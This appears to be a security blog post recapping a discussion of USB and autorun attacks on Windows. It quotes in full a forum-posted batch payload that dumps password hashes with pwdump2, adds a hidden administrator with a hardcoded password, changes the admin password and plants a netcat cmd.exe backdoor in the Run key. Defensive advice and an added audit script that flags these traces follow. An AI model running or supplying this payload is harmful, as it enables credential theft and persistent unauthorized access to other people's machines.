For the past week there has been a nice discussion on SecurityFocus on USB attacks. Basically what the hacker does is insert a USB keyring device into a computer. The USB device is loaded with an autorun.inf which points to several batch files or scripts that can

-Add new users
-Change admin rights
-Delete passwords
-Change passwords
-Use netcat to leave a backdoor
-Use pwdump to grab the SAM file
-Use basic Windows commands to grab system information
-Download trojans from a server

The possibilities are quite endless. One person (sorry I forgot who it was) actually posted his scripts that he claims work fine and have worked fine on more than one occasion:
*********<BOF test.bat>
@echo off
@start /min b.bat /B
<EOF test.bat>

*********<BOF b.bat>
@explorer .
@echo off

:isplaying Computer Information for my reference
@echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt
@Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt

::Adding a user for me )
@net user /add __system32__ .z,xmcnvb /fullname:"IPC User"
@net localgroup Administrators _system32_ /add

::Hide the Account from being shown on the welcome screen
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "__system__" /t
REG_DWORD /d 0 /f

::Enabling Admin Shares
@reg add
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v
@AutoSharewks /t reg_dword /d 1 /f

::Changing Admin Password
@net user administrator .;[pl,mkoijnbhu

@copy nc.exe <nc directory>
@cd c:
@cd <nc directory>
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v
"Taskbr" /d "nc directory\nc.exe -L -d -p 80 -e cmd.exe" /f

@echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt
@echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt
@echo ******************************************** >> Essential\DumpIt\sam.txt
<EOF b.bat>
Another person pointed out another cruel idea: leaving a CD on the ground with something like "Fourth Quarter Layoffs" written on it. I assure you more than one person would instantly insert that in their computer, and an autorun sequence could have their computer for lunch.

Gadi Evron gives some ideas to stop this kind of attack (one in particular I really like):

Disabling USB altogether, virtually, by domain policy or removing the
USB devices themselves, maybe even just filling the plugs with silicon
or glue physically are some more drastic options which some
organizations *might* take, but I don't see it as a very viable option
for most.

It all depends on your risk analysis. Cost vs. benefit, as always with

There exist several tools to monitor a domain for when and if a USB
device is connected to any remote machine, and of what kind. A simple
web search should help you find some examples.
Basically, just a heads up that this can and does happen very easily so watch out!
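As an added example (not part of the original post or of Gadi Evron's message), here is a PowerShell audit script a defender can run on a Windows host to check the two controls discussed above (autorun disabled, USB mass storage disabled by policy) and to look for the artifacts the quoted batch script leaves behind: an account hidden through SpecialAccounts\UserList, a Run-key entry that launches a shell or listener, and an unexpected member of the local Administrators group. It also lists every USB storage device Windows has recorded in its Enum\USBSTOR key, which is the simplest local answer to "when has a USB device been connected to this machine". The registry paths and values are standard Windows ones; the -Harden switch and the output wording are my own choices.

```powershell
# Added example: audit a Windows host for USB/autorun exposure and for the
# footprints of the batch script quoted in the post. Run from an elevated
# PowerShell session. -Harden applies the two mitigations shown in step 1 and 2.
[CmdletBinding()]
param([switch]$Harden)

$findings = New-Object System.Collections.Generic.List[string]

# 1. Autorun policy. 0xFF disables AutoRun for every drive type; anything else
#    leaves some drive class (CD-ROM, removable) able to run autorun.inf.
$polKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
$autorun = (Get-ItemProperty -Path $polKey -Name NoDriveTypeAutoRun -ErrorAction SilentlyContinue).NoDriveTypeAutoRun
if ($autorun -ne 0xFF) { $findings.Add("AutoRun not fully disabled (NoDriveTypeAutoRun = $autorun)") }

# 2. USB mass-storage driver. Start = 4 means the USBSTOR service is disabled,
#    so thumb drives mount nothing even though keyboards and mice still work.
$usbKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\USBSTOR'
$start = (Get-ItemProperty -Path $usbKey -Name Start -ErrorAction SilentlyContinue).Start
if ($start -ne 4) { $findings.Add("USB storage driver enabled (USBSTOR Start = $start)") }

# 3. Every USB storage device that has ever been plugged in. Windows records one
#    vendor/product subkey per model and one instance subkey per serial number.
$enumKey = 'HKLM:\SYSTEM\CurrentControlSet\Enum\USBSTOR'
if (Test-Path $enumKey) {
    Get-ChildItem $enumKey | ForEach-Object {
        Get-ChildItem $_.PSPath | ForEach-Object {
            $name = (Get-ItemProperty $_.PSPath -ErrorAction SilentlyContinue).FriendlyName
            $findings.Add("USB storage seen: $($_.PSChildName) ($name)")
        }
    }
}

# 4. Accounts hidden from the welcome screen. The quoted script hides its new
#    administrator by writing a 0 under SpecialAccounts\UserList.
$hideKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
if (Test-Path $hideKey) {
    (Get-ItemProperty $hideKey).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' -and $_.Value -eq 0 } |
        ForEach-Object { $findings.Add("Hidden account: $($_.Name)") }
}

# 5. Run-key entries that start a shell or a netcat listener. The quoted script
#    registers "nc.exe -L -d -p 80 -e cmd.exe" under a harmless-looking name.
foreach ($runKey in 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
                    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run') {
    if (-not (Test-Path $runKey)) { continue }
    (Get-ItemProperty $runKey).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' -and $_.Value -match 'cmd\.exe|nc\.exe|-e\s' } |
        ForEach-Object { $findings.Add("Suspicious Run entry: $($_.Name) = $($_.Value)") }
}

# 6. Local Administrators, so an unexpected account such as "__system32__" stands out.
try {
    Get-LocalGroupMember -Group Administrators |
        ForEach-Object { $findings.Add("Administrator: $($_.Name)") }
} catch {
    $findings.Add("Could not enumerate Administrators: $($_.Exception.Message)")
}

# Optional hardening: the two registry-level mitigations from steps 1 and 2.
if ($Harden) {
    New-Item -Path $polKey -Force | Out-Null
    Set-ItemProperty -Path $polKey -Name NoDriveTypeAutoRun -Value 0xFF -Type DWord
    Set-ItemProperty -Path $usbKey -Name Start -Value 4 -Type DWord
    $findings.Add("Applied: NoDriveTypeAutoRun = 0xFF, USBSTOR Start = 4")
}

$findings | ForEach-Object { Write-Output $_ }
```

Run it as `.\usb-audit.ps1` to report only, or `.\usb-audit.ps1 -Harden` to also apply the two settings. Disabling USBSTOR is the "disable USB by policy" option from the quote; on a domain the same two values are normally pushed through Group Policy rather than set per machine, and the Enum\USBSTOR listing is the local counterpart of the domain-wide USB monitoring tools mentioned above.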


Part of the Message:

How to make an Auto Run CD:

USB Storage FAQ:

DeviceLock -
LANDesk System Manager 8 -
OptimAccess WorkSpy -
SecureNT - /index.htm (description only in Czech)